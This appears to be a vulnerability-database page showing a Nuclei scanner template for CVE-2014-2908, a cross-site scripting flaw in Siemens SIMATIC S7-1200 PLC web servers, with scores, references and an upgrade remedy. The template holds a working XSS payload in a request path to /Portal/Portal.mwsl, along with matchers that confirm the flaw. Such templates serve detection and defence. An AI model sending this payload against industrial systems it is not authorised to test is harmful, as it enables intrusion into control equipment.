Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-2908
HistoryDec 06, 2021 - 3:13 p.m.

Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting

2021-12-0615:13:40
ProjectDiscovery
github.com
14
siemens
simatic s7-1200
cross-site scripting
cve-2014-2908
web server
upgrade

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

5.7

Confidence

High

EPSS

0.006

Percentile

79.2%

A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

id: CVE-2014-2908

info:
  name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
  remediation: Upgrade to v4.0 or later.
  reference:
    - https://www.exploit-db.com/exploits/44687
    - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2908
    - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02
    - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2014-2908
    cwe-id: CWE-79
    epss-score: 0.0045
    epss-percentile: 0.75068
    cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: siemens
    product: simatic_s7_cpu_1200_firmware
  tags: cve2014,cve,xss,siemens,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402201e07a87ca92a45e0c3e683810fe75ea4e13ef439d9c0761076ae7b1b3fedf1e402200f35676062726a99b31baaabd9878723ace952a9551ab845fb96fca30fd34799:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

5.7

Confidence

High

EPSS

0.006

Percentile

79.2%